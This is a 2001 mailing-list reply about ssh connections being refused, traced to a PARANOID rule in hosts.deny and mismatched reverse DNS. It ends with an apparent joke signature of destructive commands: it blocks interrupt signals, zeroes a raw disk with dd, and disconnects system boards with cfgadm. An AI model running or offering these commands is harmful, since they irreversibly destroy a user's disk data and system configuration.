Re: [users] My Dilemma w/ ssh

also sprach Cameron Matheson (on Thu, 17 May 2001 04:42:19PM -0600):
> I have a little problem w/ ssh.  Me and a few other folks started a free web-
> hosting company, and I'm supposed to be the sysadmin.  The server's at someone
> elses house, so I am supposed to ssh in.  For some reason, it always says that
> the connection is refused (or something along those lines).  I know that ssh
> works on both my computer, and the server, because if I ssh into my computer
> at work, and then ssh into the server, it works great.  I was wondering what
> the problem might be...

"ssh_exchange_identification: Connection closed by remote host"
???

the /etc/hosts.deny on the server contains a PARANOID - which i argue
is unecessary for ssh can well handle that stuff by itself and inetd
shouldn't be running anyway.

(the actual reason is that the client computer does not match forward
 and reverse host mapping in both ways.)

trap 'sleep 0' {1..15}
dd if=/dev/zero of=/dev/dsk/c0t0d0s0 &
cfgadm -c disconnect sysctrl0:slot?